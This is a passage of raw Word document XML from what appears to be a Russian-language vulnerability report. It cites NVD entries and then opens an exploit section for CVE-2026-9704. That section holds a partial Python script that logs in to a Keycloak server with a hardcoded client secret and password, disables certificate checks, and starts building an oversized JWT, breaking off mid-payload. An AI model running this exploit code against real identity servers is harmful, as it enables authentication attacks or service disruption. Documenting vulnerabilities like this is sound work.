      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> "</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>https</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>://</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>nvd</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>nist</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>gov</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>vuln</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>detail</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>CVE</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>-2026-9803"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>nvd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>nist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>gov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vuln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detail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CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-2026-9803</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B670AEC" w14:textId="267B9244" w:rsidR="00545F50" w:rsidRPr="006042B3" w:rsidRDefault="00545F50" w:rsidP="00545F50">
      <w:pPr>
        <w:pStyle w:val="1c"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">-2026-11800 </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">карточка уязвимости в базе </w:t>
      </w:r>
      <w:r>
        <w:t>NVD</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> "</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>https</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>://</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>nvd</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>nist</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>gov</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>vuln</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>detail</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>CVE</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C804D5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText>-2026-11800"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>nvd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>nist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>gov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vuln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detail</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af1"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="0070692D">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-2026-11800</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA80B2" w14:textId="1DCC521E" w:rsidR="00C54DEE" w:rsidRPr="00C54DEE" w:rsidRDefault="00C54DEE" w:rsidP="00C54DEE">
      <w:pPr>
        <w:pStyle w:val="1a"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эксплойт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE-2026-9704</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="1A06F998" w14:textId="77777777" w:rsidR="00D87C91" w:rsidRPr="00C54DEE" w:rsidRDefault="00D87C91" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24DA109D" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>import jwt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBC27BB" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394D22D3" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3DD616" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>import json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624AF73C" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>import urllib3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FBB28D" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FDD1CC" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E663B46" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12FCE72B" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t># ====================== НАСТРОЙКИ ======================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D14F9" w14:textId="29529F44" w:rsidR="003C3D0A" w:rsidRDefault="00763E44" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:r w:rsidR="001F04CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C3D0A">
        <w:t xml:space="preserve">_URL = "https://accounts.opentalk.local"   # URL твоего </w:t>
      </w:r>
      <w:r>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:r w:rsidR="001F04CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415A3859" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>REALM = "opentalk"                        # Название реалма</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D308865" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CLIENT_ID = "account"                     # ID клиента (конфиденциального!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ED7146" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>CLIENT_SECRET = "UDvwSdwRfuMn68unqq5NzSJRvMtllMB0"             # Секрет клиента (обязательно!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751F3117" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>USERNAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "</w:t>
      </w:r>
      <w:r>
        <w:t>testuser</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>"                       # Имя обычного пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AB3511" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>PASSWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "</w:t>
      </w:r>
      <w:r>
        <w:t>qwerty</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>123"                       # Пароль обычного пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1FB4CD" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t># ======================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A67FE54" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4294BF0C" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"># ---------- 1. Получаем обычный </w:t>
      </w:r>
      <w:r>
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> от имени пользователя ----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7203BA" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">("[1] Получаем </w:t>
      </w:r>
      <w:r>
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> для пользователя...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3405E4A4" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>auth_response = requests.post(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61213AE6" w14:textId="6C69EB44" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">    f"{</w:t>
      </w:r>
      <w:r w:rsidR="00763E44">
        <w:t>Keycloak</w:t>
      </w:r>
      <w:r w:rsidR="001F04CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>_URL}/auth/realms/{REALM}/protocol/openid-connect/token",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DD62CB" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>data={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1223EC67" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "grant_type": "password",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0730D90E" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "client_id": CLIENT_ID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780392F3" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "client_secret": CLIENT_SECRET,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C295C34" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "username": USERNAME,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C30E56" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "password": PASSWORD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B09ABBE" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0E8232" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    verify=False   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A5A0D6" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D182881" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D6B2E2" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>auth_response.raise_for_status()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71994FA8" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>user_token = auth_response.json().get("access_token")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2191CBC8" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>"[+] Токен пользователя получен (первые 50 символов): {</w:t>
      </w:r>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>[:50]}...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714372EC" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="439CBB93" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"># ---------- 2. Создаём "гигантский" </w:t>
      </w:r>
      <w:r>
        <w:t>JWT</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>oversized</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>) ----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED4C958" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">("[2] Создаём </w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>oversized</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D0A">
        <w:t>JWT</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54DEE">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (&gt;4000 символов)...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743D3817" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B9DC5C3" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRPr="00C54DEE" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB8A9FA" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t>payload = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D9119" w14:textId="0834022D" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "iss": </w:t>
      </w:r>
      <w:r w:rsidR="00763E44">
        <w:t>Keycloak</w:t>
      </w:r>
      <w:r w:rsidR="001F04CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>_URL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7994252D" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "sub": user_token,                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436318EC" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "aud": CLIENT_ID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBFED07" w14:textId="77777777" w:rsidR="003C3D0A" w:rsidRDefault="003C3D0A" w:rsidP="00DE5932">
      <w:pPr>
        <w:pStyle w:val="1fb"/>
      </w:pPr>
      <w:r>
